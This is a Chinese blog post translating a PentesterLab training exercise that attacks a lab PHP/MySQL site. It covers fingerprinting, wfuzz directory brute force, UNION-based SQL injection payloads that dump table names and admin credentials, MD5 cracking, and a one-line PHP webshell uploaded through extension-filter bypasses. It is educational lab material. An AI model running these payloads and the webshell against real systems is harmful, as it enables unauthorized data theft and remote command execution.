<!doctype html>



  


<html class="theme-next mist use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="sql注入," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="从sql注入到shell上传
这篇教程是从pentesterlab看到的，是web渗透入门一个很好的教程，网站上有该课程的靶机实体下载，非会员的话下一个iso格式的靶机，然后安装即可。看完练完以后受益匪浅，所以想翻译成中文以便日后复习之用，有些过于基础的部分就不翻译了。">
<meta property="og:type" content="article">
<meta property="og:title" content="从sql注入到shell上传">
<meta property="og:url" content="http://yoursite.com/2016/10/15/从sql注入到shell上传/index.html">
<meta property="og:site_name" content="leohujx">
<meta property="og:description" content="从sql注入到shell上传
这篇教程是从pentesterlab看到的，是web渗透入门一个很好的教程，网站上有该课程的靶机实体下载，非会员的话下一个iso格式的靶机，然后安装即可。看完练完以后受益匪浅，所以想翻译成中文以便日后复习之用，有些过于基础的部分就不翻译了。">
<meta property="og:updated_time" content="2016-10-15T06:03:07.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="从sql注入到shell上传">
<meta name="twitter:description" content="从sql注入到shell上传
这篇教程是从pentesterlab看到的，是web渗透入门一个很好的教程，网站上有该课程的靶机实体下载，非会员的话下一个iso格式的靶机，然后安装即可。看完练完以后受益匪浅，所以想翻译成中文以便日后复习之用，有些过于基础的部分就不翻译了。">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://yoursite.com/2016/10/15/从sql注入到shell上传/"/>

  <title> 从sql注入到shell上传 | leohujx </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">leohujx</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">Nothing is too difficult, if you put your heart into it.</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-categories " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                从sql注入到shell上传
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-10-15T21:36:36+08:00" content="2016-10-15">
              2016-10-15
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/web渗透/" itemprop="url" rel="index">
                    <span itemprop="name">web渗透</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="从sql注入到shell上传"><a href="#从sql注入到shell上传" class="headerlink" title="从sql注入到shell上传"></a>从sql注入到shell上传</h1><blockquote>
<p>这篇教程是从<a href="https://pentesterlab.com/exercises/from_sqli_to_shell/course" target="_blank" rel="external">pentesterlab</a>看到的，是web渗透入门一个很好的教程，网站上有该课程的靶机实体下载，非会员的话下一个iso格式的靶机，然后安装即可。看完练完以后受益匪浅，所以想翻译成中文以便日后复习之用，有些过于基础的部分就不翻译了。</p>
</blockquote>
<a id="more"></a>
<h1 id="课程简介"><a href="#课程简介" class="headerlink" title="课程简介"></a>课程简介</h1><p>这篇课程详细介绍了如何在一个php页面网站上进行sql注入，以及攻击者如何利用sql注入登陆管理员界面。</p>
<p>利用这个突破口，攻击者可以获取网站服务器的命令执行权限。</p>
<p>这次攻击主要分为3个部分:</p>
<ol>
<li>主机指纹识别：收集该网站的相关信息以及使用的技术。</li>
<li>发现和利用sql注入：在这个部分，你将会学习到sql注入的工作原理以及如何利用sql注入来挖掘出有用的信息。</li>
<li>登陆管理员界面以及执行命令：最后一步你将会侵入服务器并获取代码执行权限。</li>
</ol>
<h1 id="主机指纹识别"><a href="#主机指纹识别" class="headerlink" title="主机指纹识别"></a>主机指纹识别</h1><p>主机指纹识别可以利用不同的工具来完成，比如可以使用浏览器，我们也学能发现这个网站是用php写的[注:网页是以.php结尾的]</p>
<h2 id="检查HTTP头部"><a href="#检查HTTP头部" class="headerlink" title="检查HTTP头部"></a>检查HTTP头部</h2><p>我们可以使用netcat或者telnet来观察头部，可以获取很多信息</p>
<p><code>$ telnet vulnerable 80</code></p>
<p>解释:</p>
<ul>
<li>vulnerable是主机名或者服务端的ip地址</li>
<li>80端口是网站使用的TCP端口(HTTP默认使用的是80端口)</li>
</ul>
<p>通过发送以下的HTTP请求:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">GET / HTTP/1.1</div><div class="line">Host: vulnerable</div></pre></td></tr></table></figure>
<p>通过观察服务器给我们返回的头部信息，我们可能能够知道服务器端的PHP版本信息:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line">HTTP/1.1 200 OK</div><div class="line">Date: Thu, 24 Nov 2011 04:40:51 GMT</div><div class="line">Server: Apache/2.2.16 (Debian)</div><div class="line">X-Powered-By: PHP/5.3.3-7+squeeze3</div><div class="line">Vary: Accept-Encoding</div><div class="line">Content-Length: 1335</div><div class="line">Content-Type: text/html</div></pre></td></tr></table></figure>
<p>在这该服务端只能够通过HTTP来访问(443端口没有运行任何的东西)，如果该服务只能通过HTTPS，那么telnet和netcat就没用了，此时<code>openssl</code>就派上用场了:<br><code>$ openssl s_client -connect vulnerable:443</code></p>
<p>解释:</p>
<ul>
<li>vulnerable是主机名或者服务端的ip地址</li>
<li>443端口是网站使用的TCP端口（HTTPS默认使用的是443端口）</li>
</ul>
<p>用比如<a href="http://portswigger.net/" target="_blank" rel="external">burpsuite</a>设本地代理同样可以很轻松的发掘出信息。</p>
<h2 id="使用目录挖掘工具"><a href="#使用目录挖掘工具" class="headerlink" title="使用目录挖掘工具"></a>使用目录挖掘工具</h2><p><a href="http://www.edge-security.com/wfuzz.php" target="_blank" rel="external">wfuzz</a>这个工具可以使用暴力破解来探测该网站存在的目录和页面。</p>
<p>下面的命令可以来侦测远程主机的目录和页面地址:</p>
<p><code>$ python wfuzz.py -c -z file,wordlist/general/big.txt --hc 404 http://vulnerable/FUZZ</code></p>
<p>解释:</p>
<ul>
<li><code>-c</code>: 输出高亮</li>
<li><code>-z file,wordlist/general/big.txt</code>: 告诉wfuzz使用worldlist/general/big.txt字典来暴力破解远程主机的目录名称</li>
<li><code>--hc 404</code>: 告诉wfuzz忽略404页面(不存在)</li>
<li><code>http://vulnerable/FUZZ</code>: 远程主机地址,其中的FUZZ会被字典中的内容替换</li>
</ul>
<p>当然wufzz也可以来发现网页的php脚本:</p>
<p><code>$ python wfuzz.py -z file -f commons.txt --hc 404 http://vulnerable/FUZZ.php</code></p>
<h1 id="sql注入的发现和利用"><a href="#sql注入的发现和利用" class="headerlink" title="sql注入的发现和利用"></a>sql注入的发现和利用</h1><h2 id="sql注入的发现"><a href="#sql注入的发现" class="headerlink" title="sql注入的发现"></a>sql注入的发现</h2><h3 id="sql介绍"><a href="#sql介绍" class="headerlink" title="sql介绍"></a>sql介绍</h3><p>略，主要是介绍了select, update, insert, delete这四个命令，它们在网站上比较常用。</p>
<h3 id="数字型注入"><a href="#数字型注入" class="headerlink" title="数字型注入"></a>数字型注入</h3><p>既然错误可以被发现，那么很容易发现web上存在的漏洞。SQL注入可以通过以下这些手段发现。</p>
<blockquote>
<p>这些手段是通过利用数据库不同的表现来实现的，寻找并利用sql注入是否能成功是依赖很多的因素，虽然它们本身并不是100%可靠的，这就是为什么你需要不断尝试并保持给定的参数是不稳定的</p>
</blockquote>
<p>我们举个例子，靶机中的某个网址是URL /cat.php?id=1,你能看到第一篇文章，下面的表格显示了不同id值对应的不同内容:</p>
<table><br><tr><br><th>URL</th><br><th>显示的内容</th><br></tr><br><tr><br><td>/article.php?id=1</td><br><td>Article 1</td><br></tr><br><tr><br><td>/article.php?id=2</td><br><td>Article 1</td><br></tr><br><tr><br><td>/article.php?id=3</td><br><td>Article 1</td><br></tr><br></table>

<p>这个页面背后的PHP代码是这样的:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">$id = $_GET[&quot;id&quot;];</div><div class="line">$result= mysql_query(&quot;SELECT * FROM articles WHERE id=&quot;.$id);</div><div class="line">$row = mysql_fetch_assoc($result);</div><div class="line">// ... display of an article from the query result ...</div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<p>通过用户提供的id值(<code>_GET[&quot;id&quot;]</code>)被直接用在了sql请求中。<br>比如，使用以下网址访问:</p>
<ul>
<li><code>/article.php?id=1</code>会产生以下的sql语句<code>SELECT * FROM articles WHERE id=1</code></li>
<li><code>/article.php?id=2</code>会产生以下的sql语句<code>SELECT * FROM articles WHERE id=2</code></li>
</ul>
<p>如果某个用户使用这么个网址去访问<code>/article.php?id=2&#39;</code>，那么产生的sql命令会是这样的:<code>SELECT * FROM articles WHERE id=2&#39;</code>，但是，这样的sql语句是会有问题的，就是因为那个单引号的作用，数据库就会抛出一个错误。比如,MySQL就会报出以下的错误:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">You have an error in your SQL syntax; check the </div><div class="line">manual that corresponds to your MySQL server </div><div class="line">version for the right syntax to use near </div><div class="line">&apos;&apos;&apos; at line 1</div></pre></td></tr></table></figure>
<p>这个错误信息会因为PHP设置的不同而选择是否选择显示在HTTP的响应中。</p>
<p>在url中的id值被直接显示在请求中，并且被认为是一个整数，这导致了允许你可以请求后台数据库去执行一些数学上的操作指令:</p>
<ul>
<li>如果你输入<code>/article.php?id=2-1</code>,数据库就会执行以下的指令:<code>SELECT * FROM articles WHERE id=2-1</code>,然后article 1的内容就会被显示在出来，因为这条指令相当于<code>SELECT * FROM articles WHERE id=1</code>(减法操作会被数据库自动的执行)</li>
<li>如果你输入<code>/article.php?id=2-0</code>,那么数据库会执行以下的指令:<code>SELECT * FROM articles WHERE id=2-0</code>,然后article 2的内容就会被显示出来，因为这条指令相当于<code>SELECT * FROM articles WHERE id=2</code>.</li>
</ul>
<p>这些方法就提供一个很好的发现sql注入的思路:</p>
<ul>
<li>如果访问<code>/article.php?id=2-1</code>,显示article 1的内容，<code>/article.php?id=2-0</code>显示article 2的内容，这个减法自动被数据库执行了，那么你很有可能找到了一种注入手段</li>
<li>如果访问<code>/article.php?id=2-1</code>,显示article 2的内容，<code>/article.php?id=2-0</code>还是显示article 2的内容，那么你不太可能找得到一个数字型注入的点，但是就如我们所见，你有可能找得到一个字符串型的注入点</li>
<li>如果你在url中加入了一个单引号(<code>/article.php?id=1&#39;</code>),你应该能看到一个错误</li>
</ul>
<blockquote>
<h4 id="即使某一个值是整数型的-比如categorie-php-id-1-它在sql查询时也有可能是被当做一个字符串来对待的，SELECT-FROM-categories-where-id-39-1-39-sql允许这两种语法都是合理的，但是在实际的查询过程中，字符串型的查询会比整数型的要慢。"><a href="#即使某一个值是整数型的-比如categorie-php-id-1-它在sql查询时也有可能是被当做一个字符串来对待的，SELECT-FROM-categories-where-id-39-1-39-sql允许这两种语法都是合理的，但是在实际的查询过程中，字符串型的查询会比整数型的要慢。" class="headerlink" title="即使某一个值是整数型的(比如categorie.php?id=1),它在sql查询时也有可能是被当做一个字符串来对待的，SELECT * FROM categories where id=&#39;1&#39;,sql允许这两种语法都是合理的，但是在实际的查询过程中，字符串型的查询会比整数型的要慢。"></a>即使某一个值是整数型的(比如<code>categorie.php?id=1</code>),它在sql查询时也有可能是被当做一个字符串来对待的，<code>SELECT * FROM categories where id=&#39;1&#39;</code>,sql允许这两种语法都是合理的，但是在实际的查询过程中，字符串型的查询会比整数型的要慢。</h4></blockquote>
<h3 id="字符串型注入"><a href="#字符串型注入" class="headerlink" title="字符串型注入"></a>字符串型注入</h3><p>就如我们在介绍sql入门的时候说过，sql中字符串型的查询会被放在双引号之间(比如下面的test)<br><code>SELECT id,name FROM users where name=&#39;test&#39;;</code></p>
<p>如果在web上进行sql注入，那么在字符串中多加一个引号会打破语法规则从而产生错误。更进一步的说，只要插入2的倍数个数那么多的引号语法上是没有问题的。总的来说，奇数个引号会产生错误而偶数个不会。</p>
<p>同时我们也可以在查询的末尾进行注释，所以大部分情况下你不会得到错误提示(依赖于查询的格式)，你可以使用<code>&#39; --</code>来进行末尾注释。</p>
<p>比如想在下面的test值上做一个注入:</p>
<p><code>SELECT id,name FROM users where name=&#39;test&#39; and id=3;</code></p>
<p>会变为</p>
<p><code>SELECT id,name FROM users where name=&#39;test&#39; -- &#39; and id=3;</code></p>
<p>这样子就相当于:</p>
<p><code>SELECT id,name FROM users where name=&#39;test&#39;</code></p>
<p>然而test会产生错误如果我们会用这样的语句:</p>
<p><code>SELECT id,name FROM users where ( name=&#39;test&#39; and id=3 );</code></p>
<p>因为当末尾被注释掉时，右括号也被注释了，这样左边括号因为没有匹配的而产生错误，你可以多试几个括号来找到一种不会产生错误的语句。</p>
<p>另外一种测试的方法是使用<code>&#39; and &#39;1&#39;=&#39;1</code>,这种注入就不太会影响这个查询因为它不会产生错误的语法，比如注入之前的请求，我们可以看到语法仍然是正确的:<br><code>SELECT id,name FROM users where ( name=&#39;test&#39; and &#39;1&#39;=&#39;1&#39; and id=3 );</code></p>
<p>进一步来说,<code>&#39; and &#39;1&#39;=&#39;1</code>是基本不会影响请求的语义，无论是否有注入，结果很可能也是相同的。我们可以将它与<code>&#39; and &#39;1&#39;=&#39;0</code>进行比较，后者也不太会影响语法但是可能会改变请求中的语义。</p>
<blockquote>
<p>sql注入不是一门科学，会有很多的因素影响测试的结果。如果你认为某个方法有效，那么你就尝试着找出查询语句是怎么处理你的注入语句，以确保它确实是可注入的。</p>
</blockquote>
<p>为了找出sql注入点，你需要在所有该网站下的页面尝试不同的参数方法。一旦你找到了sql注入点，那么我们就可以开始下一节的学习。</p>
<h1 id="sql注入的利用"><a href="#sql注入的利用" class="headerlink" title="sql注入的利用"></a>sql注入的利用</h1><p>现在我们在 <a href="http://vulnerable/cat.php" target="_blank" rel="external">http://vulnerable/cat.php</a> 页面找到了一个sql注入点，为了更进一步，我们需要sql注入来挖掘出信息。为了达到这个目的，我们需要去学习下sql中的<code>UNION</code>关键字。</p>
<h2 id="UNION关键字"><a href="#UNION关键字" class="headerlink" title="UNION关键字"></a>UNION关键字</h2><p>UNION关键字用于将两个查询语句的结果一起显示出来。<br><code>SELECT * FROM articles WHERE id=3 UNION SELECT ...</code><br>既然我们是要从其他的表格中挖掘信息，那么这个关键字就可以用来构造注入的语句。查询语句的开头是由php自己产生的，所以我们不可能去更改它。然而我们可以使用UNION关键字来查询其他表格中的信息。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">SELECT id,name,price FROM articles WHERE id=3  </div><div class="line">UNION SELECT id,login,password  FROM users</div></pre></td></tr></table></figure>
<p>在使用union的时候，最关键的一点就是这两条查询语句的列数一定得相等，要不然就会出错。</p>
<h2 id="利用UNION关键字来注入"><a href="#利用UNION关键字来注入" class="headerlink" title="利用UNION关键字来注入"></a>利用UNION关键字来注入</h2><p>利用UNION关键字来注入的时候得遵循以下的原则:</p>
<ul>
<li>找到使用UNION时需要加载的列数</li>
<li>找到在页面中显示出来的列信息</li>
<li>从数据库的元数据表格中寻找信息</li>
<li>从其他表格/数据库中寻找信息</li>
</ul>
<p>为了执行sql注入，你首先得找出查询语句返回的列的数目。除非你有后台的源代码，否则你只能去猜测列数。<br>有两种方法可以去得到上述信息:</p>
<ul>
<li>使用 UNION SELECT 来尝试不同数目的列数</li>
<li>使用 ORDER BY 语句</li>
</ul>
<p>如果你使用了UNION语句，而且两个查询返回的列数不相同的时候，数据库就会抛出一个错误:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">The used SELECT statements have a different </div><div class="line">number of columns</div></pre></td></tr></table></figure>
<p>你可以使用这一点来猜测列的数目，假如你用这么一个语句<code>SELECT id,name,price FROM articles where id=1</code>你可以尝试以下步骤:</p>
<ul>
<li><code>SELECT id,name,price FROM articles where id=1 UNION SELECT 1</code>，语句<code>1 UNION SELECT 1</code>会返回一个错误因为这两个查询语句的列数不相同</li>
<li><code>SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2</code>，同样的因为列数不同，<code>1 UNION SELECT 1,2</code>也会抛出错误</li>
<li><code>SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3</code>，因为查询列数相同，那么就不会产生错误。你甚至可以看到这些数字出现在网页或者网页源代码中</li>
</ul>
<p>注意：这对MYSQL是有效的， 其他数据库不一定适用。对于那些要求UNION两边使用的相同类型的数据库来说，1,2,3也许就得改为NULL,NULL,NULL。对于ORACLE来说，select和from需要一起使用，所以此时UNION就得这么用了<code>UNION SELECT null,null,null FROM dual</code></p>
<p>另外一种方法就是使用ORDER BY,ORDER BY一般被用于告诉数据库怎样对查询结果进行排序：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">SELECT firstname,lastname,age,groups FROM users ORDER BY firstname</div></pre></td></tr></table></figure></p>
<p>上述语句就会将结果按照firstname字段进行排序</p>
<p><code>ORDER BY</code>同样也可以使用数字来告诉数据库使用第几列来对结果进行排序:<br><code>SELECT firstname,lastname,age,groups FROM users ORDER BY 3</code></p>
<p>上述语句会将第三列进行排序(age)然后返回结果</p>
<p>这个特点就可以用来探测列的数目了，如果在ORDER BY中使用的数字大于了本身数据的列数，那么数据库就会抛出一个错误(比如10):</p>
<p><code>Unknown column &#39;10&#39; in &#39;order clause&#39;</code></p>
<p>这样你就可以用ORDER BY语句，只要逐渐增加使用的数目，直到比如使用了m之后抛出错误，那么说明查询语句中返回的列数就是m-1</p>
<p>具体步骤:略</p>
<h2 id="取得数据"><a href="#取得数据" class="headerlink" title="取得数据"></a>取得数据</h2><p>现在我们知道了列数，那么就可以开始往外取数据了。通过我们知道的错误信息，发现该网站使用的数据库是MYSQL。<br>使用这个信息，我们可以让数据库替我们执行命令或者返回数据:</p>
<ul>
<li>PHP中连接数据库的用户是<code>current_user()</code></li>
<li>数据库的版本信息是<code>version()</code></li>
</ul>
<p>为了执行上述语句，我们可以从之前的表达式(<code>UNION SELECT 1,2,3</code>)中替换一些我们想要执行的语句值，来获取我们想要的信息。</p>
<blockquote>
<p>注意在挖掘信息的过程中要时刻保持列数相同</p>
</blockquote>
<p>比如你可以访问以下的网址来获取信息:</p>
<ul>
<li>数据库版本: <a href="http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,@@version,3,4" target="_blank" rel="external">http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,@@version,3,4</a></li>
<li>当前用户: <a href="http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,current_user(),3,4" target="_blank" rel="external">http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,current_user(),3,4</a></li>
<li>当前数据库: <a href="http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,database(),3,4" target="_blank" rel="external">http://vulnerable/cat.php?id=1%20UNION%20SELECT%201,database(),3,4</a></li>
</ul>
<p>现在我们就可以从数据库中获取任何我们想要的信息了。为了获取与当前网页有关的信息，我们需要:</p>
<ul>
<li>当前数据库中所有表的名称</li>
<li>关键的数据表格中所有的列名称</li>
</ul>
<p>MYSQL从5.0版本就开始提供数据表来记录数据库，表格以及列的信息。为了达到最终的效果，我们得从这些数据表中获取相关的信息。这些数据表存储在一个名叫 information_schema 的数据库中。</p>
<p>我们可以使用以下语句来取得数据:</p>
<ul>
<li>所有的表格: <code>SELECT table_name FROM information_schema.tables</code></li>
<li>所有的列: <code>SELECT column_name FROM information_schema.columns</code></li>
</ul>
<p>通过与前面的语句和url混合，你能够猜测到用哪个网页可以发掘出这些信息:</p>
<ul>
<li>列出所有表格: <code>1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables</code></li>
<li>列出所有列: <code>1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns</code></li>
</ul>
<p>不过这里有个问题，它返回的结果是一系列的表格和列名称，但是如果我们要访问特定的数据库，我们得知道哪些列属于哪些表格。幸运的是，information_schema.columns 也同时记录了表格的名称:</p>
<p><code>SELECT table_name,column_name FROM information_schema.columns</code></p>
<p>为了拿到数据，我们可以:</p>
<ul>
<li>将表格和列的名称放在不同的地方 </li>
</ul>
<p><code>1 UNION SELECT 1, table_name, column_name,4 FROM information_schema.columns</code></p>
<ul>
<li>使用CONCAT关键字来将表格名称和列的名称连在一起: </li>
</ul>
<p><code>1 UNION SELECT 1,concat(table_name,&#39;:&#39;, column_name),3,4 
FROM information_schema.columns</code></p>
<p>这样我们就能很清晰的看出table_name和column_name的对应关系了。</p>
<p>我们现在就有了很多的表格和列，第一个表格和列是属于MYSQL的默认表格，在页面源代码的末尾，我们能看到很多表格。</p>
<p>使用上述发掘出来的信息，我们可以从用户表格中取得想要的数据:<br><code>1 UNION SELECT 1,concat(login,&#39;:&#39;,password),3,4 FROM users;</code></p>
<p>这样我们就得了登陆管理员界面的用户名和密码。</p>
<h1 id="登陆管理员界面并执行命令"><a href="#登陆管理员界面并执行命令" class="headerlink" title="登陆管理员界面并执行命令"></a>登陆管理员界面并执行命令</h1><h2 id="爆破密码"><a href="#爆破密码" class="headerlink" title="爆破密码"></a>爆破密码</h2><p>在上一步我们得到管理员的用户名密码之后，发现密码是经过md5加密的(有32位)，在这里该文章介绍了使用john工具来对密码进行爆破，我自己是直接找到了一个可以直接md5解密的<a href="http://pmd5.com/" target="_blank" rel="external">网站</a>，发现原密码是 P4ssw0rd。</p>
<h2 id="上传webshell和可执行命令环境"><a href="#上传webshell和可执行命令环境" class="headerlink" title="上传webshell和可执行命令环境"></a>上传webshell和可执行命令环境</h2><p>一旦登陆了管理员界面，下一步就是找到如何登陆服务器并执行命令。</p>
<p>我们发现界面上有个地方是可以上传用户头像的，我们可以尝试着上传一个php的webshell。<br>我们可以使用最简单的一个webshell:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&lt;?php</div><div class="line">  system($_GET[&apos;cmd&apos;]);</div><div class="line">?&gt;</div></pre></td></tr></table></figure>
<p>这个webshell接收get参数并执行相应的系统命令，它需要被存储为php，比如webshell.php这种名称才行。</p>
<p>我们发现了上传文件的页面: <a href="http://vulnerable/admin/new.php,并尝试着上传脚本。" target="_blank" rel="external">http://vulnerable/admin/new.php,并尝试着上传脚本。</a></p>
<p>我们发现这个脚本并不能成功上传，因为系统禁止了.php后缀文件的上传，我们可以这样尝试:</p>
<ul>
<li>用.php3的后缀，这样网页渲染的时候还是会按照php来渲染</li>
<li>用.php.test后缀，因为.test后缀不存在，那么网页就会按照前面的.php来执行渲染页面。</li>
</ul>
<p>发现上述方法都是可以的。<br>上传成功以后我们找到上传后的地址，发现是<a href="http://vulnerable/admin/uploads/shell.php3，那么我们构造get参数即可让php脚本执行系统命令" target="_blank" rel="external">http://vulnerable/admin/uploads/shell.php3，那么我们构造get参数即可让php脚本执行系统命令</a>: <a href="http://vulnerable/admin/uploads/shell.php3?cmd=uname" target="_blank" rel="external">http://vulnerable/admin/uploads/shell.php3?cmd=uname</a></p>
<p>这个脚本缺点在于每次运行脚本都是在一个全新的环境中，并不会有上一个命令执行以后的影响，所以每次执行命令都得重新开始。</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>这个例子比较完整的展示了利用sql注入和webshell上传来达到控制服务器的目的，我们可以看出错误提示给了我们很好的提示，让我们能够知道很多的信息，所以一个解决方法就是在PHP设置中把<code>display_errors</code>这个选项给禁止掉，然后重启服务器，这样出现错误的话就不会显示在页面上。</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sql注入/" rel="tag">#sql注入</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/09/06/Hexo主题Next的配置搭建/" rel="next" title="Hexo主题Next的配置搭建">
                <i class="fa fa-chevron-left"></i> Hexo主题Next的配置搭建
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/10/17/leetcode-3/" rel="prev" title="leetcode_3">
                leetcode_3 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/uploads/cmxx.png"
               alt="leohujx" />
          <p class="site-author-name" itemprop="name">leohujx</p>
          <p class="site-description motion-element" itemprop="description">leohujx’s blog</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">53</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">7</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">24</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
